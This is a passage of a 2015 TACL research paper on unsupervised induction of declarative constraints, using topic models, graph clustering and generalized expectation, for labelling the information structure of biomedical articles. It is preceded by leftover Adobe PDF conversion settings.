/PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_v2l3qcuonvdkxoeb5oplbydezm ---- Unsupervised Declarative Knowledge Induction for Constraint-Based Learning of Information Structure in Scientific Documents Yufan Guo DTAL University of Cambridge, UK yg244@cam.ac.uk Roi Reichart Technion - IIT Haifa, Israel roiri@ie.technion.ac.il Anna Korhonen DTAL University of Cambridge, UK alk23@cam.ac.uk Abstract Inferring the information structure of scien- tific documents is useful for many NLP appli- cations. Existing approaches to this task re- quire substantial human effort. We propose a framework for constraint learning that re- duces human involvement considerably. Our model uses topic models to identify latent top- ics and their key linguistic features in input documents, induces constraints from this in- formation and maps sentences to their domi- nant information structure categories through a constrained unsupervised model. When the induced constraints are combined with a fully unsupervised model, the resulting model challenges existing lightly supervised feature- based models as well as unsupervised mod- els that use manually constructed declarative knowledge. Our results demonstrate that use- ful declarative knowledge can be learned from data with very limited human involvement. 1 Introduction Automatic analysis of scientific text can help scien- tists find information from literature faster, saving valuable research time. In this paper we focus on the analysis of the information structure (IS) of sci- entific articles where the aim is to assign each unit of an article (typically a sentence) into a category that represents the information type it conveys. By infor- mation structure we refer to a particular type of dis- course structure that focuses on the functional role of a unit in the discourse (Webber et al., 2011). For instance, in the scientific literature, the functional role of a sentence could be the background or moti- vation of the research, the methods used, the experi- ments carried out, the observations on the results, or the author’s conclusions. Readers of scientific literature find information in IS-annotated articles much faster than in unanno- tated articles (Guo et al., 2011b). Argumentative Zoning (AZ) – an information structure scheme that has been applied successfully to many scientific do- mains (Teufel et al., 2009) – has improved tasks such as summarization and information extraction and retrieval (Teufel and Moens, 2002; Tbahriti et al., 2006; Ruch et al., 2007; Liakata et al., 2012; Contractor et al., 2012). Existing approaches to information structure anal- ysis require substantial human effort. Most use feature-based machine learning, such as SVMs and CRFs (e.g. (Teufel and Moens, 2002; Lin et al., 2006; Hirohata et al., 2008; Shatkay et al., 2008; Guo et al., 2010; Liakata et al., 2012)) which rely on thousands of manually annotated training sen- tences. Also the performance of such methods is rather limited: Liakata et al. (2012) reported per- class F-scores ranging from .53 to .76 in the bio- chemistry and chemistry domains and Guo et al. (2013a) reported substantially lower numbers for the challenging Introduction and Discussion sections in biomedical domain. Guo et al. (2013a) recently applied the General- ized Expectation (GE) criterion (Mann and McCal- lum, 2007) to information structure analysis using expert knowledge in the form of discourse and lexi- cal constraints. Their model produces promising re- sults, especially for sections and categories where 131 Transactions of the Association for Computational Linguistics, vol. 3, pp. 131–143, 2015. Action Editor: Masaaki Nagata. Submission batch: 10/2014; Revision batch 1/2015; Published 3/2015. c©2015 Association for Computational Linguistics. feature-based models perform poorly. Even the unsupervised version which uses constraints under a maximum-entropy criterion without any feature- based model, outperforms fully-supervised feature- based models in detecting challenging low fre- quency categories across sections. However, this ap- proach still requires substantial human effort in con- straint generation. Particularly, lexical constraints were constructed by creating a detailed word list for each information structure category. For example, words such as “assay” were carefully selected and used as a strong indicator of the “Method” category: p(Method|assay) was constrained to be high (above 0.9). Such a constraint (developed for the biomedi- cal domain) may not be applicable to a new domain (e.g. computer science) with a different vocabulary and writing style. In fact, most existing works on learning with declarative knowledge rely on manually constructed constraints. Little work exists on automatic declar- ative knowledge induction. A notable exception is (McClosky and Manning, 2012) that proposed a constraint learning model for timeline extraction. This approach, however, requires human supervi- sion in several forms including task specific con- straint templates (see Section 2). We present a novel framework for learning declar- ative knowledge which requires very limited human involvement. We apply it to information structure analysis, based on two key observations: 1) Each information structure category defines a distribution over a section-specific and an article-level set of lin- guistic features. 2) Each sentence in a scientific doc- ument, while having a dominant category, may con- sist of features mostly related to other categories. This flexible view enables us to make use of topic models which have not proved useful in previous re- lated works (Varga et al., 2012; Reichart and Korho- nen, 2012). We construct topic models at both the individual section and article level and apply these models to data, identifying latent topics and their key linguis- tic features. This information is used to constrain or bias unsupervised models for the task in a straight- forward way: we automatically generate constraints for a GE model and a bias term for a graph clus- tering objective, such that the resulting models as- sign each of the input sentences to one information Zone Definition Background (BKG) the background of the study Problem (PROB) the research problem Method (METH) the methods used Result (RES) the results achieved Conclusion (CON) the authors’ conclusions Connection (CN) work consistent with the current work Difference (DIFF) work inconsistent with the current work Future work (FUT) the potential future direction of the research Table 1: The AZ categorization scheme of this paper structure category. Both models provide high qual- ity sentence-based classification, demonstrating the generality of our approach. We experiment with the AZ scheme for the anal- ysis of the logical structure, scientific argumenta- tion and intellectual attribution of scientific papers (Teufel and Moens, 2002), using an eight-category version of this scheme for biomedicine ((Mizuta et al., 2006; Guo et al., 2013b), Table 1). In evalu- ation against gold standard annotations, our model rivals the model of Guo et al. (2013a) which relies on manually constructed constraints, as well as a strong supervised feature-based model trained with up to 2000 sentences. In task-based evaluation we measure the usefulness of the induced categories for customized summarization (Contractor et al., 2012) from specific types of information in an article. The AZ categories induced by our model prove more valuable than those of (Guo et al., 2013a) and those in the gold standard. Our work demonstrates the great potential of automatically induced declarative knowledge in both improving the performance of in- formation structure analysis and reducing reliance of human supervision. 2 Previous Work Automatic Declarative Knowledge Induction Learning with declarative knowledge offers effective means of reducing human supervision and improv- ing performance. This framework augments feature- based models with domain and expert knowledge in the form of, e.g., linear constraints, posterior probabilities and logical formulas (e.g. (Chang et al., 2007; Mann and McCallum, 2007; Mann and McCallum, 2008; Ganchev et al., 2010)). It has proven useful for many NLP tasks including unsu- pervised and semi-supervised POS tagging, parsing (Druck et al., 2008; Ganchev et al., 2010; Rush et al., 2012) and information extraction (Chang et al., 132 2007; Mann and McCallum, 2008; Reichart and Ko- rhonen, 2012; Reichart and Barzilay, 2012). However, declarative knowledge is still created in a costly manual process. We propose inducing such knowledge directly from text with minimal human involvement. This idea could be applied to almost any NLP task. We apply it here to information struc- ture analysis of scientific documents. Little prior work exists on automatic constraint learning. Recently, (McClosky and Manning, 2012) investigated the approach for timeline extraction. They used a set of gold relations and their temporal spans and applied distant learning to find approxi- mate instances for classifier training. A set of con- straint templates specific to temporal learning were also specified. In contrast, we do not use manually specified guidance in constraint learning. Particu- larly, we construct constraints from latent variables (topics in topic modeling) estimated from raw text rather than applying maximum likelihood estimation over observed variables (fluents and temporal ex- pressions) in labeled data. Our method is therefore less dependent on human supervision. Even more recently, (Anzaroot et al., 2014) presented a super- vised dual-decomposition based method, in the con- text of citation field extraction, which automatically generates large families of constraints and learn their costs with a convex optimization objective during training. Our work is unsupervised, as opposed to their model which requires a manually annotated training corpus for constraint learning. Information Structure Analysis Various schemes have been proposed for analysing the information structure of scientific documents, in particular the patterns of topics, functions and re- lations at sentence level. Existing schemes include argumentative zones (Teufel and Moens, 2002; Mizuta et al., 2006; Teufel et al., 2009), discourse structure (Burstein et al., 2003; Webber et al., 2011), qualitative dimensions (Shatkay et al., 2008), scientific claims (Blake, 2009), scientific concepts (Liakata et al., 2010), and information status (Mark- ert et al., 2012), among others. Most previous work on automatic analysis of information structure relies on supervised learning (Teufel and Moens, 2002; Burstein et al., 2003; Mizuta et al., 2006; Shatkay et al., 2008; Guo et al., 2010; Liakata et al., 2012; Markert et al., 2012). Given the prohibitive cost of manual annotation, unsupervised and minimally supervised techniques such as clustering (Kiela et al., 2014) and topic modeling (Varga et al., 2012; Ó Séaghdha and Teufel, 2014) are highly important. However, the performance of such approaches shows a large room for improvement. Our work is specifically aimed at addressing this problem. Information Structure Learning with Declar- ative Knowledge Recently, Reichart and Korhonen (2012) and Guo et al. (2013a) developed constrained models that integrate rich linguistic knowledge (e.g. discourse patterns, syntactic features and sentence similarity information) for more reliable unsuper- vised or transductive learning of information cate- gories in scientific abstracts and articles. Guo et al. (2013a) used detailed lexical constraints developed via human supervision. Whether automatically in- duced declarative knowledge can rival such manual constraints is a question we address in this work. While Reichart and Korhonen (2012) used more general constraints, their most effective discourse constraints were tailored to scientific abstracts and are less relevant to full papers. 3 Model We introduce a topic-model based approach to declarative knowledge (DK) acquisition and describe how this knowledge can be applied to two unsuper- vised models for our task. Section 3.1 describes how topic models are used to induce topics that serve as the main building blocks of our DK. Section 3.2 ex- plains how the resulting topics and their key features are transformed into DK – constraints in the general- ized expectation (GE) model and bias functions in a graph clustering algorithm. 3.1 Inducing Information Structure Categories with Latent Dirichlet Allocation Latent Dirichlet Allocation (LDA) LDA is a gener- ative process widely used for discovering latent top- ics in text documents (Blei et al., 2003). It assumes the following generative process for each document: 1. Choose θi ∼ Dirichlet(α), i ∈{1, ...,M} 2. Choose φk ∼ Dirichlet(β),k ∈{1, ...,K} 3. For each word wij,j ∈{1, ...,Ni} (a) Choose a topic zij ∼ Multinomial(θi) (b) Choose a word wij ∼ Multinomial(φzij), 133 where θi is the distribution of topics in document i, φk is the distribution of observed features (usually words) for topic k, zij is the topic of the j-th word in document i, and wij is the j-th word in document i. A number of inference techniques have been pro- posed for the parameter estimation of this process, e.g. variational Bayes (Blei et al., 2003) and Gibbs sampling (Griffiths and Steyvers, 2004) which we use in this work. Topics and Information Structure Categories A key challenge in the application of LDA to in- formation structure analysis is defining the observed features generated by the model. Topics are usually defined to be distributions over all the words in a document, but in our task this can lead to undesired topics. Consider, for example, the following sen- tences from the Introduction section of an article: - First, exposure to BD-diol via inhalation causes an increase in Hprt mutation frequency in both mice and rats (25). - Third, BD-diol is a precursor to MI, an important urinary metabolite in humans exposed to BD (19). In a word-based topic model we can expect that most of the content words in these sentences will be gen- erated by a single topic that can be titled as “BD- diol”, or by two different topics related to “mice rat” and “human”. However, information structure categories should reflect the role of the sentence in e.g. the discourse or argument structure of the pa- per. For example, given the AZ scheme both sen- tences should belong to the background (BKG) cate- gory (Table 1). The same requirement applies to the topics induced by the topic models. Features In applying LDA to AZ, we define top- ics as distributions over: (a) words of particular syn- tactic categories; (b) syntactic (POS tag) patterns; and (c) discourse markers (citations, tables and fig- ures). Below we list our features, among which Pro- noun, Conjunction, Adjective and Adverb are novel and the rest are adapted from (Guo et al., 2013a): Citation A single feature that aggregates together the various citation formats in scientific articles (e.g. [20] or (Tudek 2007)). Table, Figure A single feature representing any ref- erences to tables or figures in a sentence. Verb Verbs are central to the meaning of a sentence. Each of the base forms of the verbs in the corpus is a unique feature. Pronoun Personal (e.g. “we”) and possessive pro- nouns (e.g. “our”) and the following adjectives (as in e.g. “our recent” or “our previous”) may indicate the ownership of the work (e.g. the author’s own vs. other people’s work), which is important for our task. Each of the above words or word combinations is a unique feature. Conjunction Conjunctions indicate the relationship between different sentences in text. We consider two types of conjunctions: (1) coordinating conjunctions (indicated by the POS tag “CC” in the output of the C&C POS tagger); and (2) saturated clausal modi- fiers (indicated by the POS tag “IN” and the corre- sponding grammatical relation “cmod” in the output of the C&C parser). Each word that forms a con- junction according to this definition is a unique fea- ture. Adjective and Adverb Adjectives provide descrip- tive information about objects, while adverbs may change or qualify the meaning of verbs or adjectives. Each adverb and adjective that appears in more than 5 articles in the corpus is a unique feature.1 Modal, Tense, Voice Previous work has demon- strated a strong correlation between tense, voice, modals and information categories (e.g. (Guo et al., 2011a; Liakata et al., 2012)). These features are in- dicated by the part-of-speech (POS) tag of verbs. For example, the phrase “may have been investi- gated” is represented as “may-MD have-VBZ be- VBN verb-VBN”. As a pre-processing step, each sentence in the in- put corpus was represented with the list of features it consists of. Consider, for example, the following sentence from a Discussion section in our data-set: - In a previous preliminary study we reported that the results of a limited proof of concept human clinical trial using sulin- dac (1-5%) and hydrogen peroxide (25%) gels applied daily for three weeks on actinic keratoses (AK) involving the upper ex- tremities [27]. Before running the Discussion section topic model (see below for the features considered by this model), this sentence is converted to the fol- lowing representation: [cite] previous preliminary we limited The topic models we construct are assumed to gen- 1We collapsed adverbs ending with -ly into the correspond- ing adjectives to reduce data sparsity. Verbs were spared the frequency cut-off because rarely occurring verbs are likely to correspond to domain-specific actions that are probably indica- tive of the METH category. 134 Model Features Article Verb, Table, Figure, Modal, Tense, Voice Introduction Citation, Pronoun, Verb, Modal, Tense, Voice Discussion Citation, Pronoun, Conjunction, Adjective, Adverb Table 2: The features used in the article-level and the section-specific topic models in this paper erate these features rather than bag-of-words. Topic Models Construction Looking at the cate- gories in Table 1 it is easy to see that different com- binations of the features in topic model generation will be relevant for different category distinctions. For example, personal pronouns are particularly rel- evant for distinguishing between categories related to current vs. previous works. Some distinctions between categories are, in turn, more relevant for some sections than for others. For example, the distinction between the background (BKG) and the definition of the research problem (PROB) is important for the Introduction section, but less important for the results section. Similarly the distinction between conclusions (CON) and differ- ence from previous work (DIFF) is more relevant for the Discussion section than other sections. We therefore constructed two types of topic mod- els: section-specific and article-level models, rea- soning that some distinctions apply globally at the article level while some apply more locally at the section level. Section-specific models were con- structed for the Introduction section and for the Dis- cussion section.2 Table 2 presents the features that are used with each topic model. A key issue in the application of topic models to our task is the definition of the unit of text for which θi, the distribution over topics, is drawn from the Dirichlet distribution (step 1 of the algorithm). This choice is data dependent, and the standard choice is the document level. However, for scientific arti- cles the paragraph level is a better choice, because a paragraph contains only a small subset of informa- tion structure categories while in a full article cat- egories are more evenly distributed. We therefore adopted the paragraph as our basic unit of text. The section-level and the article-level models are applied 2The Methods section is less suitable for a section-level topic model as 97.5% of its sentences belong to its dominant category (METH) (Table 3). Preliminary experiments with section-level topic models for the Methods and Results sections did not lead to improved performance. to the collection of paragraphs in the specific section across the test set articles or in the entire set of test articles, respectively. 3.2 Declarative Knowledge Induction Most sentence-based information structure analysis approaches associate each sentence with a unique category. However, since the MAP assignment of topics to features associates each sentence with mul- tiple topics, we cannot directly interpret the resulting topics as categories of input sentences.3 In this section we present two methods for in- corporating the information conveyed by the topic models (see Section 3.1) in unsupervised models. The first method biases a graph clustering algorithm while the second generates constraints that can be used with a GE criterion. Graph Clustering We use the graph clustering objective of Dhillon et al. (2007) which can be opti- mized efficiently, without eigenvalues calculations: max Ỹ trace(Ỹ T W −1/2 AW −1/2 Ỹ ) where A is a similarity matrix, W is a diagonal matrix of the weight of each cluster, and Ỹ is an orthonormal matrix, indicating cluster membership, which is proportional to the square root of W . To make use of topics to bias the graph clustering towards the desired solution, we define the similarity matrix A, whose (i,j)−th entry corresponds to the i-th and j-th test set sentences as follows: A(i,j) = f(Si,Sj) + γg(Si,Sj,T), where Si = {All the features extracted from sentence i } T = {Tk|Tk = {top N features associated with topic k}} f(Si,Sj) = |Si ∩Sj| g(Si,Sj,T) = { 1 ∃x ∈ Si∃y ∈ Sj∃k x ∈ Tk ∧y ∈ Tk 0 Otherwise where Tk consists of the N features that are as- signed the maximum probability according to the k- th topic. Under this formulation, the topic model term g(·) is defined to be the indicator of whether two sentences share features associated with the same topic. If this is true, the algorithm is encour- aged to assign these sentences to the same cluster. Generalized Expectation A generalized expecta- tion (GE) criterion is a term in an objective function 3Our preliminary experiments demonstrated that assigning the learned topics to the test sentences performs poorly. 135 that assigns a score to model expectations (Mann and McCallum, 2008; Druck et al., 2008; Bellare et al., 2009). Given a score function g(·), a discrim- inative model pλ(y|x), a vector of feature functions f∗(·), and an empirical distribution p̃(x), the value of a GE criterion is: g(Ep̃(x)[Epλ(y|x)[f ∗ (x,y)]]) A popular choice of g(·) is a measure of distance (e.g. L2 norm) between model and reference expec- tations. The feature functions f∗(·) and the refer- ence expectations of f∗(·) are traditionally specified by experts, which provides a way to integrate declar- ative knowledge into machine learning. Consider a Maximum Entropy (MaxEnt) model pλ(y|x) = 1Zλexp(λ · f(x,y)), where f(·) is a vec- tor of feature functions, λ the feature weights, and Zλ the partition function. The following objective function can be used for training MaxEnt with GE criteria on unlabeled data: max λ −g(Ep̃(x)[Epλ(y|x)[f ∗ (x,y)]])− ∑ j λ2j 2σ2 where the second term is a zero-mean σ2-variance Gaussian prior on parameters. Let the k-th feature function f∗k(·) be an indicator function: f ∗ k(x,y) = 1{xik=1∧y=yk} (x,y) where xik is the ik-th element/feature in the feature vector x. The model expectation of f∗k(·) becomes: Ep̃(x)[Epλ(y|x)[f ∗ k(x,y)]] = p̃(xik = 1)pλ(yk|xik = 1) To calculate g(·), a reference expectation of f∗k(·) can be obtained after specifying (the upper and lower limits of) p(yk|xik = 1): lk ≤ p(yk|xik = 1) ≤ uk This type of constraints, for example, 0.9 ≤ p(CON|suggest) ≤ 1, have been successfully ap- plied to GE-based information structure analysis by Guo et al. (2013a). Here we build on their frame- work and our contribution is the automatic induction of such constraints by topic modeling. The association between features and topics can be transformed into constraints as follows. Let Wz be a set of top N key features associated with topic z – the N features that are assigned the maximum probability according to the topic. We compute the following topic-specific feature sets: Az = {w|w ∈ Wz ∧∀t 6= z w 6∈ Wt} – the set of features associated with topic z but not with any of the other topics; Bz = ⋃ t6=z Wt – the set of features associated with at least one topic other than z. For every topic-feature pair (zk,wk) we therefore write the following constraint: lk ≤ p(zk|wk = 1) ≤ uk We set the probability range for the k-th pair as fol- lows: If wk ∈ Azk then lk = 0.9,uk = 1, If wk ∈ Bzk then lk = 0,uk = 0.1, In any other case lk = 0,uk = 1. The values of lk and uk were selected such that they reflect the strong association between the key fea- tures and their topics. Our basic reasoning is that if a sentence is represented by one of the key unique features of a given topic, it is highly likely to be as- sociated with that topic. Likewise, a sentence is un- likely to be associated with the topic of interest if it has a key feature for any other topics. 3.3 Summary of Contribution Learning with declarative knowledge is an active re- cent research avenue in the NLP community. In this framework feature-based models are augmented with domain and expert knowledge encoded most often by constraints of various types. The human effort involved with this framework is the manual specification of the declarative knowledge. This re- quires deep understanding of the domain and task in question. The resulting constraints typically spec- ify detailed associations between lexical, grammat- ical and discourse elements and the information to be learned (see, e.g., tables 2 and 3 of (Guo et al., 2013a) and table 1 of (Chang et 